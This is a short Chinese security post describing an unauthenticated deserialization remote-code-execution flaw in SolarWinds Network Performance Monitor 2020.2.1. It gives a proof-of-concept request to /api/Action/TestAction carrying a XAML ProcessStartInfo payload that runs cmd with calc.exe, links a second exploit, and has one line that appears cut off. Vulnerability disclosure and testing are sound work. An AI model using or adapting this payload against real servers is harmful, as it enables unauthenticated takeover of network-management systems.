文章来源:Khan安全攻防实验室
SolarWinds Network Performance Monitor(NPM)是集网络监测、设备性能维护管理、故障监控、网络实时流量监控和历史数据统计、汇总和历史数据分析等功能于一体的网络管理系统。
该漏洞存在于SolarWinds.Serialization库中,由于对用户提供的数据缺乏正确验证,导致不信任数据的反序列化。成功利用此漏洞的攻击者可以在系统上下文中执行任意代码,而无需经过身份验证。
影响范围
SolarWinds Network Performance Monitor 2020.2.1
Poc:
POST /api/Action/TestAction
<sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null }" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" /> 2x Base6
Poc2:
https://gist.github.com/testanull/dcb536b409a28d74430a441d53b14456